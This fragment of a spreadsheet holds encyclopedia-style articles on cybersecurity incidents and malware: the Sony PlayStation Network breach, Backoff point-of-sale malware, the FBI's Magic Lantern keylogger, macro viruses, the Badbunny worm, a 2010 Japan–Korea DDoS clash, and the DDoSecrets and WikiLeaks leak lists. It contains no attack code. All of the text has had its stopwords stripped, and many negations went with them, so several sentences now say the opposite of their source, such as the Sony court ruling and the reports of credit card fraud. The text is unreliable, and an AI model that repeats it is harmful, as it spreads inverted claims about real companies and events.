payment card industry. canadian lawsuit sony usa, sony canada sony japan claimed damages billion including free credit monitoring identity theft insurance. plaintiff quoted saying, can't trust huge multi-national corporation like sony protect private information, trust? appears sony focuses protecting games playstation users".in october 2012 california judge dismissed lawsuit sony security breach, ruling sony violated california's consumer-protection laws, citing "there thing perfect security".in 2013 united kingdom information commissioner's office charged sony £250,000 penalty putting large amount personal financial data clients risk. credit card fraud 2011, verifiable reports credit card fraud related outage. there reports internet playstation users experienced credit card fraud; however, linked incident. users registered credit card sony also reported credit card fraud. sony said codes requested services stored, hackers able decrypt record credit card details inside sony's network.sony stated letter subcommittee: many playstation network account holders provided credit card information sony computer entertainment? globally, approximately 12.3 million account holders credit card information file playstation network system. united states, approximately million account holders credit card information file system. these numbers include active expired credit cards. today, major credit card companies reported seen increase number fraudulent credit card transactions result attack, reported fraudulent transactions believe direct result intrusions described above. letter sony corporation america president howard stringer emphasized evidence credit card fraud million identity theft insurance policy would available qriocity users: date, confirmed evidence credit card personal information misused, continue monitor situation closely. also moving ahead plans help protect customers identity theft around world. program u.s. playstation network qriocity customers includes million identity theft insurance policy user launched earlier today announcements regions coming soon. change terms conditions suggested change terms conditions announced september 2011, motivated large damages claimed class action suits sony, effort minimise company's losses. agreement required users agree give right join together group class action) sony future security breach, without first trying resolve legal issues arbitrator. this included ongoing class action suits initiated prior august 2011. another clause, removed user's right trial jury user clause sending letter sony), says: class action waiver clause found illegal unenforceable, entire section unenforceable, dispute decided court sony entity dispute agree waive instance, fullest extent allowed law, trial jury. sony guaranteed court respective country, case would hold jurisdiction regards rules changes sony tos: these terms service questions relating performance, interpretation, breach enforcement terms service, rights, obligations liabilities governed laws state california. agree disputes, claims litigation arising related terms service relationship litigated court competent jurisdiction located mateo county, state california. agree subject personal jurisdiction venue location. references</t>
  </si>
  <si>
    <t>Backoff</t>
  </si>
  <si>
    <t>backoff kind malware targets point sale (pos) systems. used steal credit card data point sale machines retail stores. cybercriminals backoff gather data credit cards. installed remote desktop type applications systems configured. belongs malware family known scrape memory devices. operation backoff malware injects malicious stub explorer.exe file gain access machines scrapes victim's machine memory running processes. searches memory leftover credit card data payment card swiped. cybercriminals mutated different variants backoff variants equipped keylogging functionality. some backoff variants component helps malware upload victim's personal data, download malware onto victim machine uninstall malware. incidents backoff malware aggressive 16.2% infected third quarter 2014. survey department homeland security (dhs) states thousands businesses infected backoff malware.network security company damballa records percent infection increase backoff malware august 2014. companies like home depot, target dairy queen suffered backoff infection many smaller companies infected. also cyber electronic warfare cyber security standards cyber warfare list cyber attack threat trends proactive cyber defence references</t>
  </si>
  <si>
    <t>Magic Lantern (software)</t>
  </si>
  <si>
    <t>magic lantern keystroke logging software created united states' federal bureau investigation (fbi). magic lantern first reported column sullivan msnbc november 2001 bridis associated press. methodology magic lantern reportedly installed remotely, e-mail attachment exploiting common operating system vulnerabilities, unlike previous keystroke logger programs used fbi. described virus trojan horse. known program might store communicate recorded keystrokes. purpose response freedom information request filed 2000 electronic privacy information center, released series unclassified documents relating carnivore, included "enhanced carnivore project plan". sullivan's confidential source said redacted portions document mention "cyber knight", database sorts matches data gathered using various carnivore-like methods e-mail, chat rooms, instant messages, internet phone calls. also matches files captured encryption keys. example deployment method intends deploy magic lantern form e-mail attachment. when attachment opened, installs trojan horse suspect's computer. trojan horse activated suspect uses encryption, often used increase security sent e-mail messages. when activated, trojan horse password, allows decrypt user communications.spokesmen soon confirmed existence program called magic lantern. they denied deployed, declined comment further. antivirus vendor cooperation disclosure existence magic lantern sparked debate whether anti-virus companies could detect fbi's keystroke logger. concerns include uncertainties magic lantern's full potential whether hackers could subvert purposes outside jurisdiction law.bridis reported network associates (maker mcafee anti-virus products), contacted following press reports magic lantern ensure anti-virus software would detect program. network associates issued denial, fueling speculation anti-virus products might might detect government trojans.cnet news surveyed security companies contacts level cooperation enforcement authorities. none confirmed products cover gov-installed malware.graham cluley, technology consultant sophos, said knowing written fbi, even did, know whether used commandeered third party". another reaction came marc maiffret, chief technology officer cofounder eeye digital security states: "our customers paying service, protect forms malicious code. enforcement's not, not, make exceptions enforcement malware tools."when asked magic lantern would need court order deploy, spokesman paul bresson would comment, stating: "like technology projects tools deployed would used pursuant appropriate legal process." proponents magic lantern argue technology would allow enforcement efficiently quickly decrypt messages protected encryption schemes. implementing magic lantern require physical access suspect's computer, unlike carnivore, predecessor magic lantern, since physical access computer would require court order.following media coverage magic lantern, f-secure finnish anti-virus company), announced policy detecting government spying programs: "f-secure corporation would like make known leave backdoors f-secure anti-virus products, regardless source tools. draw line every sample regarding whether detect not. this decision-making influenced technical factors, nothing else, within applicable laws regulations, case meaning laws. also adding detection program might used terrorist activity benefit organized crime. would like state record, received queries regarding whether would guts detect something obviously made known violent mafia terrorist organization. would." also backdoor (computing) carnivore (software) computer internet protocol address verifier, recent tool echelon foxacid main core minipanzer megapanzer policeware prism (surveillance program) r2d2 (trojan) references further reading amanda christopher woo. "the case magic lantern: september highlights need increased surveillance," harvard journal technology. v15, p521. (discusses legal framework surrounding keystroke loggers enforcement) sought approval spyware terror suspects. magic lantern reloaded external links epic site carnivore questions cnbc first press story magic lantern early wire report (ap) today, november 2001 article francisco chronicle, november 2001 cnet news feds logger thwart pgp, hushmail</t>
  </si>
  <si>
    <t>1.1.1.1</t>
  </si>
  <si>
    <t>1.1.1.1 free domain name system (dns) service american company cloudflare partnership apnic. service functions recursive name server providing domain name resolution host internet. service announced april 2018. november 2018, cloudflare announced mobile application 1.1.1.1 service android ios. september 2019, cloudflare released warp, upgraded version original 1.1.1.1 mobile application. service 1.1.1.1 service operates recursive name servers public addresses listed below. addresses mapped nearest operational server anycast routing. service also available clients. users service manually changing resolvers addresses below. mobile users android iphone alternative downloading 1.1.1.1 mobile application, automatically configures resolvers device. technology 1.1.1.1 recursive resolver. cloudflare runs authoritative resolver network million internet properties. with recursor resolver network, queries answered directly.with release 1.1.1.1 mobile application november 2018, cloudflare added ability users encrypt queries https (doh) (dot). later tunnel implemented based cloudflare's boringtun, user space implementation wireguard written rust. prior usage address technology websites noted using 1.1.1.1 address service, cloudflare exposed misconfigurations existing setups violated internet standards (such rfc1918). 1.1.1.1 reserved address, abused many existing routers (mostly sold cisco systems) companies hosting login pages private networks, exit pages purposes, rendering proper routing 1.1.1.1 impossible systems. additionally, 1.1.1.1 blocked many networks multiple isps simplicity address means previously often used inappropriately testing purposes legitimate use. these previous uses huge influx garbage data cloudflare's servers. cleanup 1.1.1.1 1.0.0.1 1.0.0.0/8 block assigned 2010 apnic; time unassigned space. unassigned space, however reserved space private (called reserved address). example, at&amp;t said working fixing issue within hardware. warp september 2019, cloudflare released service called warp built 1.1.1.1 mobile app. also https public recursive name server references external links official website cloudflare docs: 1.1.1.1 public resolver cloudflare docs: setting 1.1.1.1</t>
  </si>
  <si>
    <t>2010 Japan–South Korea cyberwarfare</t>
  </si>
  <si>
    <t>february 2010, members inside, humoruniversity, ruliweb, daum truepicture, todayhumor, various korean online communities formed terror action association (taa) (korean: 테러대응연합). march 2010, attacked japanese website 2channel, coinciding 91st anniversary march movement. since 2004, inside 2chan numerous conflicts, large small. summary february 2010, users 2chan (2channers) made offensive comments korean international student beaten death russia winter 2009. "dog died, news?", "kill more!", remarks made. days prior, korean figure skater yuna gold medal 2010 vancouver winter olympics, 2channers asserted officials must bribed. these expressions 2chan flowed inside's humor program gallery. netizens inside humoruniversity (korean communities) agreed date attack march 2010, began recruiting online communities today's humor, ruliweb, daum.net. they formed terror action association, amassing 102,000 participants day.on march (gmt+9), vandalized 2chan's galleries executed massive ddos attack paralyzing 2chan's servers.according pacific internet exchange, hosting 2chan's servers, japanese servers already experiencing increased volume requests korea facilitated bots since 11:40 other websites affiliated 2chan also affected attack. evening march 2chan servers suspended addresses sources attacks blocked. march damages estimated $2.5 million. mainly 2chan's "korea slander gallery", "vip gallery", "breaking news gallery" targeted. timeline aftermath february korean online communities noticed series posts japanese website 2chan regarding yuna kim, korean figure skater, korean international student murdered russia. korean online communities claimed 2chan members accusing yuna bribery finding delight murder korean student russia. internet community, terror action association formed objective carrying cyberattack 2chan march 2010. although prohibited distribution illegal software, members continuously distributed illegal software leading attack. february around midnight, japanese posts appeared inside's comedy gallery users claimed servers slowed down, interpreted signs preemptive attack 2chan. korean appeared 2chan's korean threads well, however japanese appear 2chan's korean galleries. minutes, inside servers returned usual speeds. february attacks carried 2chan's yaoi forum. during figure skating short program vancouver olympics took place days attack, yuna took lead asada meager points gold medal. 2channers suggested yuna gold medal bribery. however, whether attack really originated korean users unclear vandalism appeared 2chan's website contain korean english phrases "i'm korean." february committee 2channers scheduled rounds attacks inside within 30-minute windows. these attacks proved ineffective. upcoming cyber began attracting attention press. march began attack teams team vandalized website, team carried ddos attack. 1:03 three minutes initiation attack, 2chan's gallery paralyzed. 1:13 five servers paralyzed. 1:16 main channel's login requests started affected. 1:22 thirty-three 2chan servers paralyzed. 1:44 entire server down. 2:13 2chan's main page hacked replaced page containing korean flag. 2:43 naver.com blocked japanese ips. 3:35 2chan blocked korean ips, servers restored. korean student japan spied japanese plans retribution. discovered website plans attacking blue house website. however, koreans disliked myung (korean president time attack) participated attack. blue house shortly blocked japanese ips. 6:11 voluntary agency network korea (vank) homepage started receiving attacks paralyzed hour soon restored. rumored vank's routers exploded attack. 6:38 attacks comedy program gallery began, attacks deflected four minutes. 8:43 organizers 2chan declared attacks. 9:35 2chan effectively downed hours, reported outcome.around following day, servers began restored servers running normally). another attack vank made without success, prompted retribution attack taa, downing control server 2chan. around attacks initiated 2chan, failed. vank blocked japanese ips. march 2chan provisionally suspended attacks promised strike august august attacks announced passed without offense either side. korean gaming portal downed confirmed attack japan. fingers pointed, including china, business establishments, speculated inside inside. japanese wiki article topic claims vank main role attack. outcome connecting 2chan impossible morning march evening march attacks shrank portion servers partially recovered. next day, third servers restored, evening dubai server completely restored. dubai server never completely restored damage, according 2chan administrators, recovery data dubai server difficult stated gallery would opening different server.the webpages vank blue house slowed attacks. there reports routers vank exploded, however, vank merely blocked japanese ips. reactions responses pacific internet exchange, managing company 2chan's servers, declared march preparing investigate event cyber-terrorism attack collaboration us's federal bureau investigation (fbi), collecting analyzing data related attack. however, investigation actually carried out. this cyber warfare collaterally impacted agencies. management big-server.com stated german enforced cyber-attacks arrested sentenced years. however, later confirmed scenario fantasized 2chan users, journalist picked published article without checking details. because investigates activity occurs within united states, unlikely actually investigated cyber war. cia, hand, investigate incident collaboration south korean japanese intelligence agencies, police forces, etc., approval ministries ends (japan official collective intelligence agency, instead intelligence clusters chief cabinet secretary's intelligence investigators, ministry justice's public inspection agency, national police agency security bureau, defense agency). head voluntary agency network korea (vank) stated, "japan hurt reputation eyes international society", "inflicting attacks different japan did. must ignore them." joongang daily– editorials criticized japanese netizens reacted winning gold medal, well korean netizens similarly reacted japanese netizens. korea communications commission stated obtaining holistic profile case preparing measures. they stated, worried protect [korean] netizens case evolves dispute countries." matsumoto tetsujo, representative softbank group, recorded blog japanese right-wing truly ability sense duty country, site anti-japanese sentiments, whether korean chinese, also gathering total power launching multi-scale assault like koreans?" references</t>
  </si>
  <si>
    <t>List of material published by Distributed Denial of Secrets</t>
  </si>
  <si>
    <t>since formation 2018, non-profit whistleblower website distributed denial secrets (abbreviated ddosecrets) published dozens terabytes data leaked organizations april 2022. 2018 russian ministry internal affairs december 2018, ddosecrets listed leak russia's ministry internal affairs, portions detailed deployment russian troops ukraine time kremlin denying military presence there. about half material leak published 2014; half emerged 2016. wikileaks reportedly rejected request host full cache files 2016, time founder julian assange focused exposing democratic party documents passed wikileaks kremlin hackers. 2019 "dark side kremlin" january 2019, ddosecrets published hundreds gigabytes hacked russian documents emails pro-kremlin journalists, oligarchs, militias. york times called release symbolic counterstrike russia's dissemination hacked emails influence american presidential election 2016", though ddosecrets founder emma best stated retaliatory action. according times, documents exposed information russio-ukrainian war, connections kremlin russian orthodox church, oligarchs' business activities. according internal bulletin issued united states department homeland security, "hack-and-leak activity" conducted ddosecrets, though organization says involved hacking, reporting jazeera daily beast identified several independent hacktivists hacker groups responsible hacks. cayman national bank trust november 2019, ddosecrets published terabytes data cayman national bank trust. files provided hacktivist known phineas fisher, included lists bank's politically exposed clients. leak used researchers study elites offshore banking. belgian authorities initiated investigation based leak "#29 leaks" following month. formations house december 2019, ddosecrets published "#29 leaks" partnership organized crime corruption reporting project. gigabytes data came formations house (now london office), "company mill" registered operated companies clients included organized crime groups, state-owned companies, fraudulent banks. leak included emails, documents, faxes, recordings phone calls.the release compared panama papers paradise papers. belgian authorities initiated investigation based data leak cayman national bank trust leak published ddosecrets prior month. chilean police military december 2019, ddosecrets published "pacoleaks" "milicoleaks": data chilean military police military. pacoleaks revealed police personnel data, extensive police files activist groups leaders, evidence police infiltrated activist groups milicoleaks included details chilean army intelligence, including operations, finance international relations. 2020 bahamas corporate registries 2020, ddosecrets published copy bahamas corporate registry. ddosecrets partnered european investigative collaborations german henri-nannen-schule journalism school create evader radar, project review dataset almost million documents. project exposed offshore holdings prominent germans, activities exxonmobil, well offshore business entities belonging devos prince families. myanmar investment commission march 2020, ddosecrets published gigabytes data hacked myanmar investment commission. release included investment management documents, permits, proposals. result leak, justice myanmar added companies list business associates myanmar military.the leak also revealed millions dollars allegedly flowed mytel subscribers myanmar military generals, exposed business dealings family members prominent military leaders. data leak later used highlight companies tied family members military leaders, likely profited 2021 coup d'état associated internet blackouts. leak also allegations profiteering resulted policy changes cost myanmar generals millions dollars. data also revealed thai state-owned companies funding myanmar junta. neo-nazi qanon discord messages april 2020, ddosecrets published almost million messages discord servers used neo-nazi qanon conspiracy theorist groups. leaked chats showed threats violence attempts influence 2018 united states midterm elections. blueleaks june 2020, ddosecrets released blueleaks, consisted gigabytes internal u.s. enforcement data obtained fusion centers hacker collective anonymous. ddosecrets called "largest published hack american enforcement agencies." betsy reed described blueleaks u.s. enforcement equivalent pentagon papers.a ddosecrets server hosting blueleaks data public download located germany, german authorities seized request united states. ddosecrets co-founder emma best reported group's "primary public download server".after leak, twitter suspended ddosecrets' account. twitter cited terms service, explicitly bars distributing "content obtained hacking contains private information, people harm danger, contains trade secrets." however, best called twitter's actions "heavy-handed", suspended users tweeted links archived copies leaked material merely mentioned leak. july reddit banned /r/blueleaks, community created discuss blueleaks, claiming posted personal information. julian assange wikileaks july 2020, ddosecrets released documents relating united states' case wikileaks founder julian assange. release also included chat logs letters assange various sources. 2021 parler social network january 2021, ddosecrets made videos scraped parler available journalists. some videos later used evidence second impeachment trial donald trump. myanmar financial data february 2021, ddosecrets gave journalists access hundreds thousands financial documents myanmar directorate investment company administration (dica). these showed google allowing coup leaders myanmar military leaders gmail addresses blogger sites, activists said indirectly supported myanmar coup. google subsequently disabled blog, google spokesperson said response presidential executive order concerning myanmar." justice myanmar called release "biggest leak myanmar history." social network february ddosecrets revealed "gableaks", collection gigabytes data gab, including million posts, passwords, private messages, leaked information. data given group hacktivist self-identifying "jaxparo", titling leak "jaxparo little anonymous revival project". jaxparo retrieved data gab's back-end databases expose platform's largely right-wing userbase. best called gableaks "another gold mine research people looking militias, neo-nazis, right, qanon everything surrounding january 6."the group said would release data publicly contained large amount private sensitive information, instead shared data select journalists, social scientists, researchers. andy greenberg wired confirmed data "does appear contain users' individual group profiles—their descriptions privacy settings—public private posts, passwords". givesendgo april 2021, distributed denial secrets made donor information christian crowdfunding site givesendgo available journalists researchers. information identified previously anonymous high-dollar donors far-right actors including members proud boys, many whose fundraising efforts directly related 2021 united states capitol attack. platform previously criticized refusal restrict far-right extremists. leak also revealed police officers public officials united states donated kyle rittenhouse. 2021, today used givesendgo data report nearly $100,000 raised proud boys givesendgo people chinese descent days 2021 capitol attack. following month, used data report member koch family anonymously donated crowdfunding campaign supporting 2020 election fraud conspiracy theories. chicago city hall emails april 2021, ddosecrets published cache emails chicago city hall. emails revealed city's handling fatal shootings police officers violates state federal consent decree. emails also exposed mayor's secret lobbying qualified immunity, secret drone program funded off-the-books cash, city's problems police chases george floyd protests. emails also revealed mayor's office unaware cpd's facial recognition software clearview receiving inquiries journalists. washington, d.c. police 2021, ddosecrets republished leak washington d.c.'s metropolitan police department, including 90,000 emails. among things, files revealed details surveillance right-wing extremists response 2021 united states capitol attack. reporting based files d.c. passing budget reformed parts city's gang database management. linestar integrity services june 2021, ddosecrets released 73,500 emails, accounting files, contracts, business documents around gigabytes source code data pipeline services firm linestar integrity services. they also released gigabytes employee data. presque isle, maine police june 2021, gigabytes data presque isle police department posted online, including 15,000 emails, police reports, witness statements 1970s present. ddosecrets mirrored files gave journalists, repost publicly, citing privacy concerns. oath keepers september 2021, ddosecrets publicly released emails chat logs american far-right oath keepers organization public. they also provided member donor data press. this exposed hundreds members enforcement, hundred members ties military dozens political office. aerial surveillance footage november 2021, ddosecrets released terabytes police helicopter surveillance footage dallas police department georgia state patrol. according wired, footage showed helicopters capturing everything cars lined drive-through, people standing yards street. non-profit advocacy group fight future called leak crystal-clear example mass surveillance makes society less safe, safe." 2022 givesendgo february 2022, many anonymous donors supported 2022 freedom convoy, ddosecrets began providing journalists researchers hacked list donors' personal information givesendgo. later month, givesendgo hacked again, exposing donors every campaign site's history, ddosecrets gave journalists researchers. russian leaks during russo-ukrainian war, ddosecrets published datasets russian leaks, totaling least terabytes. emma best estimated group published million russian documents months began.nbc news reported site "might single best public repository russian files purportedly leaked since start invasion", intercept wrote become facto home" russian leaks. tetraedr february 2022, days russian invasion ukraine began, ddosecrets indexed emails, missile testing footage schematics weapons systems belarusian weapons manufacturer tetraedr. data hacked released anonymous liberland pwn-bär hack team. roskomnadzor march 2022, hacking group anonymous claimed responsibility theft publication around gigabytes documents russian government agency roskomnadzor. this group performed various cyberattacks russian websites 2022 russian invasion ukraine. leak revealed previously unknown online surveillance system tracking anti-war sentiment "threats" russian stability putin regime since least 2020. other leaks march gigabytes emails omega co., research development branch pipeline company transneft gigabytes emails investment firm thozis corporation gigabytes emails mining equipment manufacturer mashoil 22.5 gigabytes data reportedly central bank russia gigabytes emails construction firm rostproekt 15.3 gigabytes data state-run nuclear energy company rosatom state nuclear energy corp. 51.9 gigabytes emails investment firm marathon group, owned alexander vinokurov other leaks april gigabytes emails russian orthodox church (limited distribution) gigabytes emails documents state-owned mosekspertiza corporation, provides services russian businesses more 900,000 emails all-russia state television radio broadcasting company (vgtrk) 250,000 emails russian department education gigabytes emails firm capital legal services gigabytes emails office building complex petersburg gigabytes emails engineering company aerogas 35.7 gigabytes emails logging wood manufacturing company forest more 200,000 emails russian ministry culture, oversees censorship, archives, gigabytes emails city blagoveshchensk gigabytes emails tver oblast governor's office gigabytes emails chemical company technotec gigabytes emails processing facilities designer gazprom linde engineering gigabytes data pipeline facility construction company gazregion gigabytes emails city strezhevoy gigabytes data travel agency continent express gigabytes emails oil, gas, drilling engineering company neocom geoservice gigabytes data belarusian surveillance system developer synesis gigabytes emails general department troops civil construction, russian ministry defense-owned construction company gigabytes emails financial banking document processing company tendertech gigabytes emails investment firm worldwide invest gigabytes emails property management firm sawatzky gigabytes emails commercial real estate investment company accent capital gigabytes emails hydraulic tools producer enerpred also list material published wikileaks list public disclosures classified information list government surveillance projects references</t>
  </si>
  <si>
    <t>Macro virus</t>
  </si>
  <si>
    <t>computing terminology, macro virus virus written macro language: programming language embedded inside software application (e.g., word processors spreadsheet applications). some applications, microsoft office, excel, powerpoint allow macro programs embedded documents macros automatically document opened, provides distinct mechanism malicious computer instructions spread. this reason dangerous open unexpected attachments e-mails. many antivirus programs detect macro viruses; however, macro virus' behavior still difficult detect fundamentals macro series commands actions helps automating tasks usually quite short simple program. however created, need executed system interprets stored commands. some macro systems self-contained programs, others built complex applications (for example word processors) allow users repeat sequences commands easily, allow developers tailor application local needs. operation macro virus spread e-mail attachments, removable media, networks internet, notoriously difficult detect. common macro virus infect computer replacing normal macros virus. macro virus replaces regular commands name runs command selected. these malicious macros start automatically document opened closed, without user's knowledge.once file containing macro virus opened, virus infect system. when triggered, begin embed documents templates. corrupt parts system, depending resources macro application access. when infected documents shared users systems, virus spreads. macro viruses used method installing software system without user's consent, used download install software internet automated key-presses. however, uncommon usually fruitful virus coder since installed software usually noticed uninstalled user.since macro virus depends application rather operating system, infect computer running operating system targeted application ported. particular, since microsoft word available macintosh computers, word macro viruses attack macs addition windows platforms.an example macro virus melissa virus appeared march 1999. when user opens microsoft word document containing melissa virus, computer becomes infected. virus sends email first people person's address book. this made virus replicate fast rate.not macro viruses detected antivirus software. caution opening email attachments documents decreases chance becoming infected. prevalence macro viruses, starting microsoft office 2007, microsoft assigned separate file extensions ending office files containing macros order prevent users opening macro virus-infected files intended contain macros first place.on february, microsoft announced office files originating internet macros blocked default, starting april 2022. also malware software intended break computers steal private information computer virus computer worm trojan horse (computing) malware hidden inside anti-virus software apps ransomware (malware) spyware technical support scam unsolicited phone calls fake "tech support" person, claiming computer virus problems references further reading microsoft corporation. (2006). introduction security. retrieved june 2006 trustees indiana university. (2006). what computer viruses, worms, trojan horses? retrieved june 2006 macro viruses security news information</t>
  </si>
  <si>
    <t>Badbunny</t>
  </si>
  <si>
    <t>bunny, also known sb/bad bunny-a (sophos) staroffice/bad bunny (mcafee), multi-platform computer worm written several scripting languages distributed openoffice.org document containing macro written star basic. discovered 2007, worm spreads dropping malicious script files affect behavior popular programs mirc x-chat, causing send worm users. effects macro opened affected document, displays following message: "title: ///badbunny\\\" body: "hey '[username]' like badbunny?" loads four different scripts named badbunny.js (js.badbunny) windows, badbunny.pl (perl.badbunny) linux/unix, either badbunny.rb badbunnya.rb (ruby.badbunny) upon loading, user shown pornographic image dressed rabbit making scantily clad woman woods. references</t>
  </si>
  <si>
    <t>List of material published by WikiLeaks</t>
  </si>
  <si>
    <t>since 2006, document archive website wikileaks published anonymous submissions documents typically unavailable general public. 2006–2008 apparent somali assassination order wikileaks posted first document december 2006, decision assassinate government officials, signed sheikh hassan dahir aweys. yorker reported [julian] assange others uncertain authenticity, thought readers, using wikipedia-like features site, would help analyze they published decision lengthy commentary, asked, bold manifesto flamboyant islamic militant links laden? clever smear intelligence, designed discredit union, fracture somali alliances manipulate china?" document's authenticity never determined, news wikileaks quickly superseded leak itself. daniel arap family corruption august 2007, guardian featured front page story corruption family former kenyan leader daniel arap moi. newspaper stated source information wikileaks. northern rock bank 2007, bank northern rock suffered crisis propped emergency loan bank england. during crisis, judge banned media publishing sales prospectus northern rock issued. wikileaks hosted copy prospectus letters lawyers schillings warning publication prospectus. bank julius baer lawsuit february 2008, wikileaks.org domain name taken offline swiss bank julius baer sued wikileaks wikileaks.org domain registrar, dynadot, court california, united states, obtained permanent injunction ordering shutdown. wikileaks hosted allegations illegal activities bank's cayman islands branch. wikileaks' u.s. registrar, dynadot, complied order removing entries. however, website remained accessible numeric address, online activists immediately mirrored wikileaks dozens alternative websites worldwide.the american civil liberties union electronic frontier foundation filed motion protesting censorship wikileaks. reporters committee freedom press assembled coalition media press filed amicus curiae brief wikileaks' behalf. coalition included major u.s. newspaper publishers press organisations, american society news editors, associated press, citizen media project, scripps company, gannett company, hearst corporation, angeles times, national newspaper publishers association, newspaper association america society professional journalists. coalition requested heard friend court call attention relevant points believed court overlooked grounds wikileaks appeared court defend itself, first amendment issues raised court). amongst things, coalition argued that: wikileaks provides forum dissidents whistleblowers across globe post documents, dynadot injunction imposes prior restraint drastically curtails access wikileaks internet based limited number postings challenged plaintiffs. dynadot injunction therefore violates bedrock principle injunction cannot enjoin communication publisher speaker. judge, jeffrey white, issued injunction vacated february 2008, citing first amendment concerns questions legal jurisdiction. wikileaks thus able bring site online again. bank dropped case march 2008. judge also denied bank's request order prohibiting website's publication.the executive director reporters committee freedom press, lucy dalglish, commented: it's often federal judge degree turn case dissolves order. we're pleased judge recognized constitutional implications prior restraint. guantanamo procedures copy standard operating procedures camp delta–the protocol u.s. army guantanamo detention camp–dated march 2003 released wikileaks website november 2007. document, named "gitmo-sop.pdf", also mirrored guardian. release revealed restrictions placed detainees camp, including designation prisoners off-limits international committee cross, something u.s. military past repeatedly denied. also showed military dogs used intimidate prisoners, children young held guantanamo prisoners held isolation weeks make pliable. guantánamo manual included procedures transferring prisoners methods evading protocols geneva convention.on december 2007, wikileaks released copy 2004 edition manual, together detailed analysis changes. tibetan dissent china march 2008, wikileaks made uncensored videos civil unrest tibet available viewing, around official chinese censorship worst unrest. scientology march 2008, wikileaks published referred "the collected secret 'bibles' scientology". april 2008, reported receiving letter (dated march) religious technology center claiming ownership several documents pertaining levels within church scientology. these documents center 1994 scandal. email stated: advanced technology materials unpublished, copyrighted works. please advised customer's action regard violates united states copyright law. accordingly, help removing works immediately service. letter continued request release logs uploader, would remove anonymity. wikileaks responded statement released wikinews stating: response attempted suppression, wikileaks release several thousand additional pages scientology material next week", sarah palin's yahoo! email account contents september 2008, 2008 united states presidential election campaigns, contents yahoo! account belonging sarah palin (the running mate republican presidential nominee john mccain) posted wikileaks hacked members anonymous. alleged wired contents mailbox indicate used private yahoo! account send work-related messages, violation public record laws. hacking account widely reported mainstream news outlets. although wikileaks able conceal hacker's identity, source palin emails eventually publicly identified david kernell, 20-year-old economics student university tennessee democratic tennessee state representative mike kernell memphis, whose email address listed various social networking sites) linked hacker's identity anonymous. kernell attempted conceal identity using anonymous proxy service ctunnel.com, but, illegal nature access, ctunnel website administrator gabriel ramuglia assisted tracking source hack. killings kenyan police wikileaks publicised reports extrajudicial executions kenyan police week starting november 2008 home page. human rights investigators involved, oscar kamau kingara john paul oulu, made major contributions kenya national commission human rights (knchr) report redistributed wikileaks, blood report extra-judicial killings disappearances, assassinated several months later, march 2009. wikileaks called information assassination. 2009, amnesty international gave wikileaks julian assange award distribution knchr's blood report. membership list after briefly appearing blog, membership list far-right british national party posted wikileaks november 2008. name, address, occupation many 13,500 members given, including several police officers, solicitors, four ministers religion, least doctor, number primary secondary school teachers. britain, police officers banned joining promoting bnp, least officer dismissed member. known going considerable lengths conceal identities members. november, leader nick griffin stated knew identity person initially leaked list november, describing "hardliner" senior employee left party 2007. october 2009, list members april 2009 leaked. this list contained 11,811 members. 2009 congressional research service reports february 2009, wikileaks released 6,780 congressional research service reports. contributors coleman campaign march 2009, wikileaks published list contributors norm coleman senatorial campaign. climategate emails november 2009, controversial documents, including e-mail correspondence climate scientists, released (allegedly illegally obtained) university east anglia's (uea) climatic research unit (cru). according university, emails documents obtained server hacking; prominent host full archive wikileaks. barclays bank avoidance march 2009 documents concerning complex arrangements made barclays bank avoid appeared wikileaks. documents ordered removed website guardian. editorial issue, guardian pointed that, mismatch resources, collectors (hmrc) rely websites wikileaks obtain documents. internet censorship lists wikileaks published lists forbidden illegal addresses several countries. march 2009, wikileaks published alleged australian communications media authority's blacklist sites banned australia's proposed laws internet censorship. reactions publication list australian media politicians varied. particular note made journalistic outlets type websites list; internet censorship scheme submitted australian labor party 2008 proposed stated intention preventing access child pornography sites related terrorism, list leaked wikileaks contains number sites unrelated crimes involving minors. when questioned leak, stephen conroy, minister broadband, communications digital economy australia's rudd labor government, responded claiming list actual list, threatening prosecute anyone involved distributing march 2009, wikileaks published updated list, dated march 2009; closely matches claimed size acma blacklist, contains pages independently confirmed blacklisted acma. wikileaks also contains details internet censorship thailand, including lists censored sites dating back 2006.wikileaks published list sites blacklisted denmark. bilderberg group meeting reports since 2009, wikileaks made available reports several meetings bilderberg group. includes group's history meeting reports years 1955, 1956, 1957, 1958, 1960, 1962, 1963 1980. 2008 peru scandal january 2009, wikileaks released telephone intercept recordings peruvian politicians businessmen involved "petrogate" scandal. release tapes featured front pages five peruvian newspapers. nuclear accident iran july 2009, iranian news agencies reported head iran's atomic energy organization gholam reza aghazadeh abruptly resigned unknown reasons twelve years office. shortly afterwards wikileaks released report disclosing "serious nuclear accident" iranian natanz nuclear facility 2009. federation american scientists (fas) released statistics number enriched centrifuges operational iran mysteriously declined 4,700 3,900 beginning around time nuclear incident wikileaks mentioned would occurred.according media reports accident direct result cyberattack iran's nuclear program, carried stuxnet computer worm. toxic dumping africa: minton report september 2006, commodities giant trafigura commissioned internal report toxic dumping incident ivory coast, (according united nations) affected 108,000 people. document, called minton report, names various harmful chemicals "likely present" waste notes "may cause harm distance". report states potential health effects include "burns skin, eyes lungs, vomiting, diarrhea, loss consciousness death", suggests high number reported casualties "consistent significant release hydrogen sulphide gas". september 2009, trafigura's lawyers, carter-ruck, obtained secret "super-injunction" guardian, banning newspaper publishing contents document. trafigura also threatened number media organizations legal action published report's contents, including norwegian broadcasting corporation chemical engineer magazine. september 2009, wikileaks posted report.on october, carter-ruck warned guardian mentioning content parliamentary question asked report. instead, paper published article stating unable report unspecified question claiming situation appeared "call question privileges guaranteeing free speech established 1689 bill rights". suppressed details rapidly circulated internet twitter and, amid uproar, carter-ruck agreed next modification injunction challenged court, permitting guardian reveal existence question injunction. injunction lifted october. kaupthing bank wikileaks made available internal document kaupthing bank prior collapse iceland's banking sector, 2008–2012 icelandic financial crisis. document shows suspiciously large sums money loaned various owners bank, large debts written off. kaupthing's lawyers threatened wikileaks legal action, citing banking privacy laws. leak caused uproar iceland. criminal charges relating multibillion-euro loans exista major shareholders investigated. bank seeking recover loans taken former bank employees collapse. joint services protocol october 2009, joint services protocol 440, 2,400-page restricted document written 2001 british ministry defence leaked. contained instructions security services avoid leaks information hackers, journalists, foreign spies. 9/11 pager messages november 2009, wikileaks released 570,000 intercepts pager messages sent september attacks. chelsea manning (see below) commented database. among released messages communications pentagon officials york city police department. 2010 u.s. intelligence report wikileaks march 2010, wikileaks released secret 32-page u.s. department defense counterintelligence analysis report march 2008. document described prominent reports leaked website. these related u.s. security interests, described potential methods marginalizing organization. wikileaks editor julian assange said details army report inaccurate recommendations flawed, also concerns u.s. army raised report hypothetical. report discussed deterring potential whistleblowers termination employment criminal prosecution existing former insiders, leakers 